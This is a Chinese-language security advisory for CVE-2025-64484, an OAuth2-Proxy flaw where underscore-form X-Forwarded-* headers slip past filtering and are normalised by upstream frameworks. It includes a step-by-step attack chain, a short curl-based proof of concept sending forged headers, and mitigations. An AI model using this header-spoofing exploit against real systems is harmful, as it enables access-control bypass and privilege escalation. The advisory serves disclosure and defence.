CVE-2025-64484 OAuth2-Proxy HTTP头规范化绕过漏洞

漏洞信息

漏洞编号

CVE-2025-64484

漏洞类型

HTTP头注入/权限提升

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

oauth2-proxy

漏洞概述

OAuth2-Proxy 7.13.0之前版本存在HTTP头规范化安全漏洞。该工具作为开源反向代理或中间件组件部署时，在处理HTTP请求头过程中存在设计缺陷。攻击者利用某些Web框架（如Django、Flask、FastAPI、PHP应用）会将HTTP头中的下划线（_）自动规范化为破折号（-）的特性，通过注入带下划线的X-Forwarded-*头变体绕过OAuth2-Proxy的安全过滤逻辑。虽然OAuth2-Proxy自身的认证授权机制未被攻破，但此漏洞可导致上游应用程序产生权限提升风险，攻击者可能利用伪造的转发头信息获取更高权限或访问受限资源。

技术细节

OAuth2-Proxy默认会对特定的HTTP头进行过滤和剥离（如X-Forwarded-For、X-Forwarded-Host等），以防止攻击者伪造客户端信息。然而在7.13.0之前的版本中，其过滤逻辑仅检查标准的破折号格式（如X-Forwarded-For），未考虑下划线变体（如X_Forwarded_For）。当请求经过OAuth2-Proxy转发到上游应用时，某些框架会先将HTTP头规范化处理，将下划线转换为破折号。这导致原本被OAuth2-Proxy过滤的头信息在上游应用中被还原并生效。攻击者可以通过发送包含下划线格式X-Forwarded-*头的请求，绕过OAuth2-Proxy的检查，在上游应用中获得伪造的客户端IP、主机名等属性，从而实现权限提升或绕过访问控制。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标环境是否使用OAuth2-Proxy（<7.13.0版本）作为反向代理或中间件，并确认上游应用是否使用会将下划线规范化为破折号的框架（如Django、Flask、FastAPI、PHP）

STEP 2

2.获取有效认证

攻击者通过OAuth2-Proxy的正常认证流程获取有效的会话令牌，使其能够通过OAuth2-Proxy向受保护的上游应用发起请求

STEP 3

3.构造恶意请求

攻击者构造HTTP请求，在请求头中使用下划线格式的X-Forwarded-*头（如X_Forwarded_For、X_Forwarded_Host、X_Forwarded_Proto），这些头不会被OAuth2-Proxy的过滤逻辑拦截

STEP 4

4.绕过代理过滤

OAuth2-Proxy接收到包含下划线格式头的请求后，由于其过滤逻辑仅检查破折号格式，这些头被允许通过并转发给上游应用

STEP 5

5.上游应用规范化处理

上游应用收到请求后，其底层框架（如Django WSGI、Flask）将HTTP头规范化，将X_Forwarded_For还原为X-Forwarded-For，使攻击者注入的伪造头信息生效

STEP 6

6.权限提升/攻击完成

上游应用基于伪造的X-Forwarded-*头信息进行访问控制决策，攻击者可能借此绕过IP限制、伪造管理员身份或访问受限资源，实现权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-64484 PoC - HTTP Header Injection via Underscore Normalization
# This PoC demonstrates the header bypass vulnerability in OAuth2-Proxy < 7.13.0

TARGET_URL="https://vulnerable-oauth2-proxy.example.com/oauth2/callback"
OAUTH2_PROXY_HOST="vulnerable-oauth2-proxy.example.com"

# Normal request (OAuth2-Proxy strips this header)
echo "[+] Sending request with dash-format X-Forwarded-For (blocked by OAuth2-Proxy):"
curl -k -s -o /dev/null -w "%{http_code}" \
  -H "X-Forwarded-For: 10.0.0.1" \
  "${TARGET_URL}"

# Bypassed request (OAuth2-Proxy does NOT strip this header due to underscore)
echo -e "\n[+] Sending request with underscore-format X_Forwarded_For (bypasses OAuth2-Proxy):"
curl -k -s -o /dev/null -w "%{http_code}" \
  -H "X_Forwarded_For: 10.0.0.1" \
  -H "X_Forwarded_Host: malicious.example.com" \
  -H "X_Forwarded_Proto: https" \
  "${TARGET_URL}"

echo -e "\n[+] Exploit complete - headers bypass OAuth2-Proxy filtering"

影响范围

oauth2-proxy < 7.13.0

防御指南

临时缓解措施

临时缓解措施：在上游应用的Web服务器或应用代码层面，确保HTTP头处理逻辑不会将下划线和破折号视为等价。具体做法包括：配置Nginx/Apache等Web服务器拒绝带下划线的特定头部；或在应用代码中显式检查并拒绝X_Forwarded_*格式的请求头。同时建议在负载均衡器层面添加规则，过滤异常的HTTP头格式。